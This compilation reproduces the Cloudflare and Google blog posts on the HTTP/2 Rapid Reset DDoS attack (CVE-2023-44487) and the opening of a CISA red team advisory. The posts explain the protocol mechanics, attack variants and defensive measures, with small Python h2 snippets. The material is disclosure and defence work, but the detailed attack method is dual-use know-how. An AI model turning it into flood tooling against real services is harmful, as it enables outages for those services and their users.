HTTP/2 Rapid Reset: deconstructing the record-breaking attack

10/10/2023

Lucas Pardue
Julien Desgats

Beginning on August 25, 2023, we noticed unusually large HTTP attacks hitting many of our customers. These attacks were detected and mitigated by our automated DDoS system. It was not long, however, before they started to reach record-breaking sizes, eventually peaking just above 201 million requests per second. This was nearly 3x bigger than our previous largest attack on record.

What is concerning is that the attacker was able to generate such an attack with a botnet of merely 20,000 machines. There are botnets today that are made up of hundreds of thousands or millions of machines. Given that the entire web typically sees only between 1–3 billion requests per second, it’s not inconceivable that this method could focus an entire web’s worth of requests on a small number of targets.

Detecting and Mitigating

This was a novel attack vector at an unprecedented scale, but Cloudflare’s existing protections were largely able to absorb the brunt of the attacks. While initially we saw some impact to customer traffic — affecting roughly 1% of requests during the initial wave of attacks — today we’ve been able to refine our mitigation methods to stop the attack for any Cloudflare customer without it impacting our systems.

We noticed these attacks at the same time two other major industry players — Google and AWS — were seeing the same. We worked to harden Cloudflare’s systems to ensure that, today, all our customers are protected from this new DDoS attack method without any customer impact. We’ve also participated with Google and AWS in a coordinated disclosure of the attack to impacted vendors and critical infrastructure providers.

This attack was made possible by abusing some features of the HTTP/2 protocol and server implementation details (see CVE-2023-44487 for details). Because the attack abuses an underlying weakness in the HTTP/2 protocol, we believe any vendor that has implemented HTTP/2 will be subject to the attack. This includes every modern web server. We, along with Google and AWS, have disclosed the attack method to web server vendors, who we expect will implement patches. In the meantime, the best defense is using a DDoS mitigation service like Cloudflare’s in front of any web-facing web or API server.

This post dives into the details of the HTTP/2 protocol, the feature that attackers exploited to generate these massive attacks, and the mitigation strategies we took to ensure all our customers are protected. Our hope is that by publishing these details other impacted web servers and services will have the information they need to implement mitigation strategies. And, moreover, the HTTP/2 protocol standards team, as well as teams working on future web standards, can better design them to prevent such attacks.

RST attack details

HTTP is the application protocol that powers the Web. HTTP Semantics are common to all versions of HTTP — the overall architecture, terminology, and protocol aspects such as request and response messages, methods, status codes, header and trailer fields, message content, and much more. Each individual HTTP version defines how semantics are transformed into a “wire format” for exchange over the Internet. For example, a client has to serialize a request message into binary data and send it, then the server parses that back into a message it can process.

HTTP/1.1 uses a textual form of serialization. Request and response messages are exchanged as a stream of ASCII characters, sent over a reliable transport layer like TCP, using the following format (where CRLF means carriage-return and linefeed):

 HTTP-message   = start-line CRLF
                   *( field-line CRLF )
                   CRLF
                   [ message-body ]

For example, a very simple GET request for https://blog.cloudflare.com/ would look like this on the wire:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLF

And the response would look like:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFContent-Type: text/html; charset=UTF-8CRLFCRLF<100 bytes of data>

This format frames messages on the wire, meaning that it is possible to use a single TCP connection to exchange multiple requests and responses. However, the format requires that each message is sent whole. Furthermore, in order to correctly correlate requests with responses, strict ordering is required, meaning that messages are exchanged serially and cannot be multiplexed. Two GET requests, for https://blog.cloudflare.com/ and https://blog.cloudflare.com/page/2/, would be:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLFGET /page/2/ HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLF

With the responses:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFContent-Type: text/html; charset=UTF-8CRLFCRLF<100 bytes of data>CRLFHTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFContent-Type: text/html; charset=UTF-8CRLFCRLF<100 bytes of data>

Web pages require more complicated HTTP interactions than these examples. When visiting the Cloudflare blog, your browser will load multiple scripts, styles and media assets. If you visit the front page using HTTP/1.1 and decide quickly to navigate to page 2, your browser can pick from two options. Either wait for all of the queued up responses for the page that you no longer want before page 2 can even start, or cancel in-flight requests by closing the TCP connection and opening a new connection. Neither of these is very practical. Browsers tend to work around these limitations by managing a pool of TCP connections (up to 6 per host) and implementing complex request dispatch logic over the pool.

HTTP/2 addresses many of the issues with HTTP/1.1. Each HTTP message is serialized into a set of HTTP/2 frames that have type, length, flags, stream identifier (ID) and payload. The stream ID makes it clear which bytes on the wire apply to which message, allowing safe multiplexing and concurrency. Streams are bidirectional. Clients send frames and servers reply with frames using the same ID.

In HTTP/2 our GET request for https://blog.cloudflare.com would be exchanged across stream ID 1, with the client sending one HEADERS frame, and the server responding with one HEADERS frame, followed by one or more DATA frames. Client requests always use odd-numbered stream IDs, so subsequent requests would use stream ID 3, 5, and so on. Responses can be served in any order, and frames from different streams can be interleaved.
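To make the framing concrete, here is a minimal client-side sketch using the Python h2 library (hyper-h2). It illustrates the frame exchange described above and is not Cloudflare’s implementation; tls_sock stands in for an already established TLS connection negotiated for HTTP/2 via ALPN.

    import h2.config
    import h2.connection

    config = h2.config.H2Configuration(client_side=True)
    conn = h2.connection.H2Connection(config=config)
    conn.initiate_connection()              # queues the client preface and SETTINGS

    # A GET with no message content is a single HEADERS frame with END_STREAM set.
    conn.send_headers(
        stream_id=1,                        # client-initiated streams are odd-numbered
        headers=[
            (":method", "GET"),
            (":path", "/"),
            (":scheme", "https"),
            (":authority", "blog.cloudflare.com"),
        ],
        end_stream=True,
    )
    tls_sock.sendall(conn.data_to_send())   # serialized HTTP/2 frames on the wire

A second request would simply reuse the same connection with stream_id=3, and the responses can arrive in any order.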

Stream multiplexing and concurrency are powerful features of HTTP/2. They enable more efficient usage of a single TCP connection. HTTP/2 optimizes resource fetching, especially when coupled with prioritization. On the flip side, making it easy for clients to launch large amounts of parallel work can increase the peak demand for server resources when compared to HTTP/1.1. This is an obvious vector for denial-of-service.

In order to provide some guardrails, HTTP/2 provides a notion of maximum active concurrent streams. The SETTINGS_MAX_CONCURRENT_STREAMS parameter allows a server to advertise its limit of concurrency. For example, if the server states a limit of 100, then only 100 requests can be active at any time. If a client attempts to open a stream above this limit, it must be rejected by the server using a RST_STREAM frame. Stream rejection does not affect the other in-flight streams on the connection.
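As an illustration of how that limit is advertised, here is a minimal server-side sketch with the same Python h2 library; client_sock is an assumed, already accepted TLS socket, and the limit of 100 mirrors the example above rather than any particular server’s configuration.

    import h2.config
    import h2.connection
    import h2.settings

    config = h2.config.H2Configuration(client_side=False)
    conn = h2.connection.H2Connection(config=config)
    conn.initiate_connection()
    # Advertise the concurrency limit; a compliant client must not exceed it,
    # and a stream opened beyond it is refused with RST_STREAM.
    conn.update_settings({h2.settings.SettingCodes.MAX_CONCURRENT_STREAMS: 100})
    client_sock.sendall(conn.data_to_send())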

The true story is a little more complicated. Streams have a lifecycle. Below is a diagram of the HTTP/2 stream state machine. Client and server manage their own views of the state of a stream. HEADERS, DATA and RST_STREAM frames trigger transitions when they are sent or received. Although the views of the stream state are independent, they are synchronized.

HEADERS and DATA frames include an END_STREAM flag that, when set to 1 (true), can trigger a state transition.

Let’s work through this with an example of a GET request that has no message content. The client sends the request as a HEADERS frame with the END_STREAM flag set to 1. The client first transitions the stream from the idle to the open state, then immediately transitions into the half-closed state. In the client’s half-closed state it can no longer send HEADERS or DATA, only WINDOW_UPDATE, PRIORITY or RST_STREAM frames. It can, however, receive any frame.

Once the server receives and parses the HEADERS frame, it transitions the stream state from idle to open and then half-closed, so it matches the client. The server half-closed state means it can send any frame but receive only WINDOW_UPDATE, PRIORITY or RST_STREAM frames.

The response to the GET contains message content, so the server sends HEADERS with END_STREAM flag set to 0, then DATA with END_STREAM flag set to 1. The DATA frame triggers the transition of the stream from half-closed to closed on the server. When the client receives it, it also transitions to closed. Once a stream is closed, no frames can be sent or received.

Applying this lifecycle back into the context of concurrency, HTTP/2 states:

Streams that are in the “open” state or in either of the “half-closed” states count toward the maximum number of streams that an endpoint is permitted to open. Streams in any of these three states count toward the limit advertised in the SETTINGS_MAX_CONCURRENT_STREAMS setting.

In theory, the concurrency limit is useful. However, there are practical factors that hamper its effectiveness, which we will cover later in the blog.

HTTP/2 request cancellation

Earlier, we talked about client cancellation of in-flight requests. HTTP/2 supports this in a much more efficient way than HTTP/1.1. Rather than needing to tear down the whole connection, a client can send a RST_STREAM frame for a single stream. This instructs the server to stop processing the request and to abort the response, which frees up server resources and avoids wasting bandwidth.
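Continuing the client sketch from earlier (the same assumed conn and tls_sock), cancelling the in-flight request on stream 1 is just one more frame:

    import h2.errors

    # RST_STREAM with the CANCEL error code aborts only this stream; the
    # TCP connection and every other stream on it remain usable.
    conn.reset_stream(stream_id=1, error_code=h2.errors.ErrorCodes.CANCEL)
    tls_sock.sendall(conn.data_to_send())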

Let’s consider an example of three requests sent on streams 1, 3 and 5. This time the client cancels the request on stream 1 after all of the HEADERS have been sent. The server parses this RST_STREAM frame before it is ready to serve the response, and instead only responds to streams 3 and 5:

Request cancellation is a useful feature. For example, when scrolling a webpage with multiple images, a web browser can cancel images that fall outside the viewport, meaning that images entering it can load faster. HTTP/2 makes this behaviour a lot more efficient compared to HTTP/1.1.

A request stream that is canceled rapidly transitions through the stream lifecycle. The client’s HEADERS with END_STREAM flag set to 1 transitions the state from idle to open to half-closed, then RST_STREAM immediately causes a transition from half-closed to closed.

Recall that only streams that are in the open or half-closed state contribute to the stream concurrency limit. When a client cancels a stream, it instantly gets the ability to open another stream in its place and can send another request immediately. This is the crux of what makes CVE-2023-44487 work.

Rapid resets leading to denial of service

HTTP/2 request cancellation can be abused to rapidly reset an unbounded number of streams. When an HTTP/2 server is able to process client-sent RST_STREAM frames and tear down state quickly enough, such rapid resets do not cause a problem. Where issues start to crop up is when there is any kind of delay or lag in tidying up. The client can churn through so many requests that a backlog of work accumulates, resulting in excess consumption of resources on the server.

A common HTTP deployment architecture is to run an HTTP/2 proxy or load-balancer in front of other components. When a client request arrives it is quickly dispatched and the actual work is done as an asynchronous activity somewhere else. This allows the proxy to handle client traffic very efficiently. However, this separation of concerns can make it hard for the proxy to tidy up the in-process jobs. Therefore, these deployments are more likely to encounter issues from rapid resets.

When Cloudflare’s reverse proxies process incoming HTTP/2 client traffic, they copy the data from the connection’s socket into a buffer and process that buffered data in order. As each request is read (HEADERS and DATA frames) it is dispatched to an upstream service. When RST_STREAM frames are read, the local state for the request is torn down and the upstream is notified that the request has been canceled. Rinse and repeat until the entire buffer is consumed. However, this logic could be abused: when a malicious client started sending an enormous chain of requests and resets at the start of a connection, our servers would eagerly read them all and create stress on the upstream servers to the point of being unable to process any new incoming requests.
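A highly simplified sketch of that kind of buffered frame-processing loop is shown below. It is not Cloudflare’s proxy code; parse_frames, make_request_state, dispatch_upstream and cancel_upstream are hypothetical helpers standing in for the real components.

    def process_buffer(buffer, streams):
        for frame in parse_frames(buffer):               # frames in arrival order
            if frame.type in ("HEADERS", "DATA"):
                streams[frame.stream_id] = make_request_state(frame)
                dispatch_upstream(frame.stream_id)       # asynchronous work starts upstream
            elif frame.type == "RST_STREAM":
                streams.pop(frame.stream_id, None)       # tear down local state
                cancel_upstream(frame.stream_id)         # tell the upstream to stop
        # A malicious client can fill the buffer with request/reset pairs faster
        # than the cancellations can take effect, building up a backlog upstream.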

Something that is important to highlight is that stream concurrency on its own cannot mitigate rapid reset. The client can churn requests to create high request rates no matter the server’s chosen value of SETTINGS_MAX_CONCURRENT_STREAMS.

Rapid Reset dissected

Here’s an example of rapid reset reproduced using a proof-of-concept client attempting to make a total of 1000 requests. I’ve used an off-the-shelf server without any mitigations, listening on port 443 in a test environment. The traffic is dissected using Wireshark and filtered to show only HTTP/2 traffic for clarity. Download the pcap to follow along.

It’s a bit difficult to see, because there are a lot of frames. We can get a quick summary via Wireshark’s Statistics > HTTP2 tool:

The first frame in this trace, in packet 14, is the server’s SETTINGS frame, which advertises a maximum stream concurrency of 100. In packet 15, the client sends a few control frames and then starts making requests that are rapidly reset. The first HEADERS frame is 26 bytes long, all subsequent HEADERS are only 9 bytes. This size difference is due to a compression technology called HPACK. In total, packet 15 contains 525 requests, going up to stream 1051.

Interestingly, the RST_STREAM for stream 1051 doesn’t fit in packet 15, so in packet 16 we see the server respond to it with a 404. Then, in packet 17, the client does send the RST_STREAM before moving on to sending the remaining 475 requests.

Note that although the server advertised 100 concurrent streams, both packets sent by the client contained far more HEADERS frames than that. The client did not have to wait for any return traffic from the server; it was only limited by the size of the packets it could send. No server RST_STREAM frames are seen in this trace, indicating that the server did not observe a concurrent stream violation.

Impact on customers

As mentioned above, as requests are canceled, upstream services are notified and can abort requests before wasting too many resources on them. This was the case with this attack: most malicious requests were never forwarded to the origin servers. However, the sheer size of these attacks did cause some impact.

First, as the rate of incoming requests reached peaks never seen before, we had reports of increased levels of 502 errors seen by clients. This happened in our most impacted data centers as they struggled to process all the requests. While our network is meant to deal with large attacks, this particular vulnerability exposed a weakness in our infrastructure. Let’s dig a little deeper into the details, focusing on how incoming requests are handled when they hit one of our data centers:

We can see that our infrastructure is composed of a chain of different proxy servers with different responsibilities. In particular, when a client connects to Cloudflare to send HTTPS traffic, it first hits our TLS decryption proxy: it decrypts TLS traffic, processes HTTP/1.x, HTTP/2 or HTTP/3 traffic, then forwards it to our “business logic” proxy. This proxy is responsible for loading all the settings for each customer, then routing the requests correctly to other upstream services, and, more importantly in our case, it is also responsible for security features. This is where L7 attack mitigation is processed.

The problem with this attack vector is that it manages to send a lot of requests very quickly on every single connection. Each of them had to be forwarded to the business logic proxy before we had a chance to block it. As the request throughput exceeded our proxy capacity, the pipe connecting these two services reached saturation on some of our servers.

When this happens, the TLS proxy can no longer connect to its upstream proxy, which is why some clients saw a bare “502 Bad Gateway” error during the most serious attacks. It is important to note that, as of today, the logs used to create HTTP analytics are also emitted by our business logic proxy. The consequence is that these errors are not visible in the Cloudflare dashboard. Our internal dashboards show that about 1% of requests were impacted during the initial wave of attacks (before we implemented mitigations), with peaks of around 12% for a few seconds during the most serious one on August 29th. The following graph shows the ratio of these errors over a two-hour period while this was happening:

We worked to reduce this number dramatically in the following days, as detailed later in this post. Thanks both to changes in our stack and to mitigations that considerably reduce the size of these attacks, this number is effectively zero today.

499 errors and the challenges for HTTP/2 stream concurrency

Another symptom reported by some customers is an increase in 499 errors. The reason for this is a bit different and is related to the maximum stream concurrency in an HTTP/2 connection detailed earlier in this post.

HTTP/2 settings are exchanged at the start of a connection using SETTINGS frames. In the absence of an explicit parameter, default values apply. Once a client establishes an HTTP/2 connection, it can wait for the server’s SETTINGS (slow) or it can assume the default values and start making requests (fast). For SETTINGS_MAX_CONCURRENT_STREAMS, the default is effectively unlimited (stream IDs use a 31-bit number space, and requests use odd numbers, so the actual limit is 1073741824). The specification recommends that a server offer no fewer than 100 streams. Clients are generally biased towards speed, so they don’t tend to wait for server settings, which creates a bit of a race condition. Clients are taking a gamble on what limit the server might pick; if they guess wrong, the request will be rejected and will have to be retried. Gambling on 1073741824 streams is a bit silly. Instead, a lot of clients decide to limit themselves to issuing 100 concurrent streams, in the hope that servers follow the specification’s recommendation. Where servers pick something below 100, this client gamble fails and streams are reset.

There are many reasons a server might reset a stream beyond overstepping the concurrency limit. HTTP/2 is strict and requires a stream to be closed when there are parsing or logic errors. In 2019, Cloudflare developed several mitigations in response to HTTP/2 DoS vulnerabilities. Several of those vulnerabilities were caused by a client misbehaving, leading the server to reset a stream. A very effective strategy to clamp down on such clients is to count the number of server resets during a connection, and when that exceeds some threshold value, close the connection with a GOAWAY frame. Legitimate clients might make one or two mistakes in a connection and that is acceptable. A client that makes too many mistakes is probably either broken or malicious, and closing the connection addresses both cases.

While responding to DoS attacks enabled by CVE-2023-44487, Cloudflare reduced maximum stream concurrency to 64. Before making this change, we were unaware that clients don’t wait for SETTINGS and instead assume a concurrency of 100. Some web pages, such as an image gallery, do indeed cause a browser to send 100 requests immediately at the start of a connection. Unfortunately, the 36 streams above our limit all needed to be reset, which triggered our counting mitigations. This meant that we closed connections on legitimate clients, leading to a complete page load failure. As soon as we realized this interoperability issue, we changed the maximum stream concurrency to 100.

Actions from the Cloudflare side

In 2019 several DoS vulnerabilities were uncovered related to implementations of HTTP/2. Cloudflare developed and deployed a series of detections and mitigations in response. CVE-2023-44487 is a different manifestation of an HTTP/2 vulnerability. However, to mitigate it we were able to extend the existing protections to monitor client-sent RST_STREAM frames and close connections when they are being used for abuse. Legitimate client uses of RST_STREAM are unaffected.
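A minimal sketch of that kind of counting mitigation is shown below, again using the Python h2 library; the threshold and time window are illustrative and are not Cloudflare’s actual values. In an h2-based server, on_client_rst_stream would be called whenever a StreamReset event with remote_reset set to True is observed.

    import time
    import h2.errors

    RESET_LIMIT = 200        # illustrative: client resets tolerated per window
    WINDOW_SECONDS = 10      # illustrative sliding window

    class ConnectionGuard:
        def __init__(self):
            self.reset_times = []

        def on_client_rst_stream(self, conn, sock):
            now = time.monotonic()
            # Keep only the resets seen inside the current window.
            self.reset_times = [t for t in self.reset_times if now - t < WINDOW_SECONDS]
            self.reset_times.append(now)
            if len(self.reset_times) > RESET_LIMIT:
                # Too many client-sent RST_STREAMs: treat the connection as
                # abusive and close it instead of absorbing more requests.
                conn.close_connection(error_code=h2.errors.ErrorCodes.ENHANCE_YOUR_CALM)
                sock.sendall(conn.data_to_send())
                sock.close()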

In addition to a direct fix, we have implemented several improvements to the server’s HTTP/2 frame processing and request dispatch code. Furthermore, the business logic server has received improvements to queuing and scheduling that reduce unnecessary work and improve cancellation responsiveness. Together these lessen the impact of various potential abuse patterns, while giving the server more room to process requests before saturating.

Mitigate attacks earlier

Cloudflare already had systems in place to efficiently mitigate very large attacks with less expensive methods. One of them is named “IP Jail”. For hyper volumetric attacks, this system collects the client IPs participating in the attack and stops them from connecting to the attacked property, either at the IP level or in our TLS proxy. This system, however, needs a few seconds to be fully effective; during these precious seconds, the origins are already protected, but our infrastructure still needs to absorb all HTTP requests. As this new botnet has effectively no ramp-up period, we need to be able to neutralize attacks before they can become a problem.

To achieve this we expanded the IP Jail system to protect our entire infrastructure: once an IP is “jailed”, not only is it blocked from connecting to the attacked property, we also forbid the corresponding IP from using HTTP/2 to connect to any other domain on Cloudflare for some time. Such protocol abuses are not possible over HTTP/1.x, so this limits the attacker’s ability to run large attacks, while any legitimate client sharing the same IP would only see a very small performance decrease during that time. IP-based mitigations are a very blunt tool, which is why we have to be extremely careful when using them at that scale and seek to avoid false positives as much as possible. Moreover, the lifespan of a given IP in a botnet is usually short, so any long-term mitigation is likely to do more harm than good. The following graph shows the churn of IPs in the attacks we witnessed:

As we can see, many new IPs spotted on a given day disappear very quickly afterwards.

As all these actions happen in our TLS proxy at the beginning of our HTTPS pipeline, this saves considerable resources compared to our regular L7 mitigation system. This allowed us to weather these attacks much more smoothly; the number of random 502 errors caused by these botnets is now down to zero.

Observability improvements

Another front on which we are making changes is observability. Returning errors to clients that are not visible in customer analytics is unsatisfactory. Fortunately, a project has been underway to overhaul these systems since long before the recent attacks. It will eventually allow each service within our infrastructure to log its own data, instead of relying on our business logic proxy to consolidate and emit log data. This incident underscored the importance of this work, and we are redoubling our efforts.

We are also working on better connection-level logging, allowing us to spot such protocol abuses much more quickly to improve our DDoS mitigation capabilities.

Conclusion

While this was the latest record-breaking attack, we know it won’t be the last. As attacks continue to become more sophisticated, Cloudflare works relentlessly to proactively identify new threats — deploying countermeasures to our global network so that our millions of customers are immediately and automatically protected.

Cloudflare has provided free, unmetered and unlimited DDoS protection to all of our customers since 2017. In addition, we offer a range of additional security features to suit the needs of organizations of all sizes. Contact us if you’re unsure whether you’re protected or want to understand how you can be.


Source :
https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/

How it works: The novel HTTP/2 ‘Rapid Reset’ DDoS attack

October 10, 2023

Juho Snellman
Staff Software Engineer

Daniele Iamartino
Staff Site Reliability Engineer

A number of Google services and Cloud customers have been targeted with a novel HTTP/2-based DDoS attack which peaked in August. These attacks were significantly larger than any previously-reported Layer 7 attacks, with the largest attack surpassing 398 million requests per second.

The attacks were largely stopped at the edge of our network by Google’s global load balancing infrastructure and did not lead to any outages. While the impact was minimal, Google’s DDoS Response Team reviewed the attacks and added additional protections to further mitigate similar attacks. In addition to Google’s internal response, we helped lead a coordinated disclosure process with industry partners to address the new HTTP/2 vector across the ecosystem.


Below, we explain the predominant methodology for Layer 7 attacks over the last few years, what changed in these new attacks to make them so much larger, and the mitigation strategies we believe are effective against this attack type. This article is written from the perspective of a reverse proxy architecture, where the HTTP request is terminated by a reverse proxy that forwards requests to other services. The same concepts apply to HTTP servers that are integrated into the application server, but with slightly different considerations which potentially lead to different mitigation strategies.

A primer on HTTP/2 for DDoS

Since late 2021, the majority of Layer 7 DDoS attacks we’ve observed across Google first-party services and Google Cloud projects protected by Cloud Armor have been based on HTTP/2, both by number of attacks and by peak request rates.

A primary design goal of HTTP/2 was efficiency, and unfortunately the features that make HTTP/2 more efficient for legitimate clients can also be used to make DDoS attacks more efficient.

Stream multiplexing

HTTP/2 uses “streams”, bidirectional abstractions used to transmit various messages, or “frames”, between the endpoints. “Stream multiplexing” is the core HTTP/2 feature which allows higher utilization of each TCP connection. Streams are multiplexed in a way that can be tracked by both sides of the connection while only using one Layer 4 connection. Stream multiplexing enables clients to have multiple in-flight requests without managing multiple individual connections.

One of the main constraints when mounting a Layer 7 DoS attack is the number of concurrent transport connections. Each connection carries a cost, including operating system memory for socket records and buffers, CPU time for the TLS handshake, and the fact that each connection needs a unique four-tuple (the IP address and port pair for each side of the connection), which constrains the number of concurrent connections between two IP addresses.

In HTTP/1.1, each request is processed serially. The server will read a request, process it, write a response, and only then read and process the next request. In practice, this means that the rate of requests that can be sent over a single connection is one request per round trip, where a round trip includes the network latency, proxy processing time and backend request processing time. While HTTP/1.1 pipelining is available in some clients and servers to increase a connection’s throughput, it is not prevalent amongst legitimate clients.

With HTTP/2, the client can open multiple concurrent streams on a single TCP connection, each stream corresponding to one HTTP request. The maximum number of concurrent open streams is, in theory, controllable by the server, but in practice clients may open 100 streams per connection, and the servers process these requests in parallel. It’s important to note that server limits cannot be unilaterally adjusted.

For example, the client can open 100 streams and send a request on each of them in a single round trip; the proxy will read and process each stream serially, but the requests to the backend servers can again be parallelized. The client can then open new streams as it receives responses to the previous ones. This gives an effective throughput for a single connection of 100 requests per round trip, with similar round trip timing constants to HTTP/1.1 requests. This will typically lead to almost 100 times higher utilization of each connection.
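To make that arithmetic concrete, here is a minimal client sketch with the Python h2 library that issues 100 requests in a single round trip on one connection; example.com, the /asset/N paths and tls_sock are placeholders, and real clients add flow control and response handling on top of this.

    import h2.config
    import h2.connection

    conn = h2.connection.H2Connection(config=h2.config.H2Configuration(client_side=True))
    conn.initiate_connection()

    stream_id = 1
    for n in range(100):                                  # 100 streams, one round trip
        conn.send_headers(
            stream_id=stream_id,
            headers=[
                (":method", "GET"),
                (":path", f"/asset/{n}"),
                (":scheme", "https"),
                (":authority", "example.com"),
            ],
            end_stream=True,
        )
        stream_id += 2                                    # client streams are odd-numbered

    tls_sock.sendall(conn.data_to_send())                 # all 100 requests leave together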

The HTTP/2 Rapid Reset attack

The HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way; the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed.

This attack is called Rapid Reset because it relies on the ability for an endpoint to send a RST_STREAM frame immediately after sending a request frame, which makes the other endpoint start working and then rapidly resets the request. The request is canceled, but leaves the HTTP/2 connection open.

Figure: HTTP/1.1 and HTTP/2 request and response pattern

The HTTP/2 Rapid Reset attack built on this capability is simple: The client opens a large number of streams at once as in the standard HTTP/2 attack, but rather than waiting for a response to each request stream from the server or proxy, the client cancels each request immediately.

The ability to reset streams immediately allows each connection to have an indefinite number of requests in flight. By explicitly canceling the requests, the attacker never exceeds the limit on the number of concurrent open streams. The number of in-flight requests is no longer dependent on the round-trip time (RTT), but only on the available network bandwidth.

In a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client, on the other hand, pays almost no cost for sending the requests. This creates an exploitable cost asymmetry between the server and the client.

Another advantage the attacker gains is that the explicit cancellation of requests immediately after creation means that a reverse proxy server won’t send a response to any of the requests. Canceling the requests before a response is written reduces downlink (server/proxy to attacker) bandwidth.

HTTP/2 Rapid Reset attack variants

In the weeks after the initial DDoS attacks, we have seen some Rapid Reset attack variants. These variants are generally not as efficient as the initial version was, but might still be more efficient than standard HTTP/2 DDoS attacks.

The first variant does not immediately cancel the streams, but instead opens a batch of streams at once, waits for some time, and then cancels those streams and immediately opens another large batch of new streams. This attack may bypass mitigations that are based on just the rate of inbound RST_STREAM frames (such as allowing at most 100 RST_STREAMs per second on a connection before closing it).

These attacks lose the main advantage of the canceling attacks by not maximizing connection utilization, but still have some implementation efficiencies over standard HTTP/2 DDoS attacks. But this variant does mean that any mitigation based on rate-limiting stream cancellations should set fairly strict limits to be effective.

The second variant does away with canceling streams entirely, and instead optimistically tries to open more concurrent streams than the server advertised. The benefit of this approach over the standard HTTP/2 DDoS attack is that the client can keep the request pipeline full at all times, and eliminate client-proxy RTT as a bottleneck. It can also eliminate the proxy-server RTT as a bottleneck if the request is to a resource that the HTTP/2 server responds to immediately.

RFC 9113, the current HTTP/2 RFC, suggests that an attempt to open too many streams should invalidate only the streams that exceeded the limit, not the entire connection. We believe that most HTTP/2 servers will not process those streams, which is what enables the non-cancelling attack variant: the server accepts and processes a new stream almost immediately after responding to a previous stream.

A multifaceted approach to mitigations

We don’t expect that simply blocking individual requests is a viable mitigation against this class of attacks — instead the entire TCP connection needs to be closed when abuse is detected. HTTP/2 provides built-in support for closing connections, using the GOAWAY frame type. The RFC defines a process for gracefully closing a connection that involves first sending an informational GOAWAY that does not set a limit on opening new streams, and one round trip later sending another that forbids opening additional streams.

However, this graceful GOAWAY process is usually not implemented in a way which is robust against malicious clients. This form of mitigation leaves the connection vulnerable to Rapid Reset attacks for too long, and should not be used for building mitigations as it does not stop the inbound requests. Instead, the GOAWAY should be set up to limit stream creation immediately.
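A minimal sketch of that immediate form of GOAWAY, using the Python h2 library, is shown below; the function name and the ENHANCE_YOUR_CALM error code are illustrative choices, and highest_processed_stream_id is whatever stream ID the server has already accepted.

    import h2.errors

    def close_abusive_connection(conn, sock, highest_processed_stream_id):
        # Advertise the last stream we will handle and refuse everything newer,
        # rather than following the graceful two-step GOAWAY described above.
        conn.close_connection(
            error_code=h2.errors.ErrorCodes.ENHANCE_YOUR_CALM,
            last_stream_id=highest_processed_stream_id,
        )
        sock.sendall(conn.data_to_send())
        sock.close()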

This leaves the question of deciding which connections are abusive. A client canceling requests is not inherently abusive; the feature exists in the HTTP/2 protocol to help better manage request processing. Typical situations are when a browser no longer needs a resource it had requested due to the user navigating away from the page, or applications using a long polling approach with a client-side timeout.

Mitigations for this attack vector can take multiple forms, but mostly center around tracking connection statistics and using various signals and business logic to determine how useful each connection is. For example, if a connection has more than 100 requests with more than 50% of the given requests canceled, it could be a candidate for a mitigation response. The magnitude and type of response depends on the risk to each platform, but responses can range from forceful GOAWAY frames as discussed before to closing the TCP connection immediately.
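As a sketch of that kind of per-connection bookkeeping (the thresholds simply mirror the example in the text), the decision below could feed the immediate GOAWAY shown earlier:

    class ConnectionStats:
        def __init__(self):
            self.requests = 0
            self.cancelled = 0

        def on_request(self):
            self.requests += 1

        def on_client_cancel(self):
            self.cancelled += 1

        def looks_abusive(self):
            # Example policy: more than 100 requests on the connection,
            # and more than half of them cancelled by the client.
            return self.requests > 100 and self.cancelled > self.requests / 2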

To mitigate against the non-cancelling variant of this attack, we recommend that HTTP/2 servers should close connections that exceed the concurrent stream limit. This can be either immediately or after some small number of repeat offenses.

Applicability to other protocols

We do not believe these attack methods translate directly to HTTP/3 (QUIC) due to protocol differences, and Google does not currently see HTTP/3 used as a DDoS attack vector at scale. Despite that, our recommendation is for HTTP/3 server implementations to proactively implement mechanisms to limit the amount of work done by a single transport connection, similar to the HTTP/2 mitigations discussed above.

Industry coordination

Early in our DDoS Response Team’s investigation and in coordination with industry partners, it was apparent that this new attack type could have a broad impact on any entity offering the HTTP/2 protocol for their services. Google helped lead a coordinated vulnerability disclosure process taking advantage of a pre-existing coordinated vulnerability disclosure group, which has been used for a number of other efforts in the past.

During the disclosure process, the team focused on notifying large-scale implementers of HTTP/2, including infrastructure companies and server software providers. The goal of these prior notifications was to develop and prepare mitigations for a coordinated release. In the past, this approach has allowed widespread protections to be enabled for service providers or made available via software updates for many packages and solutions.

During the coordinated disclosure process, we reserved CVE-2023-44487 to track fixes to the various HTTP/2 implementations.

Next steps

The novel attacks discussed in this post can have significant impact on services of any scale. All providers who have HTTP/2 services should assess their exposure to this issue. Software patches and updates for common web servers and programming languages may be available to apply now or in the near future. We recommend applying those fixes as soon as possible.

For our customers, we recommend patching software and enabling the Application Load Balancer and Google Cloud Armor, which has been protecting Google and existing Google Cloud Application Load Balancing users.

Source :
https://cloud.google.com/blog/products/identity-security/how-it-works-the-novel-http2-rapid-reset-ddos-attack

CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks

Release Date: February 28, 2023
Alert Code: AA23-059A

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory (CSA) detailing activity and key findings from a recent CISA red team assessment, conducted in coordination with the assessed organization, to provide network defenders recommendations for improving their organization’s cyber posture.

Actions to take today to harden your local environment:

  • Establish a security baseline of normal network activity; tune network and host-based appliances to detect anomalous behavior.
  • Conduct regular assessments to ensure appropriate procedures are created and can be followed by security staff and end users.
  • Enforce phishing-resistant MFA to the greatest extent possible.

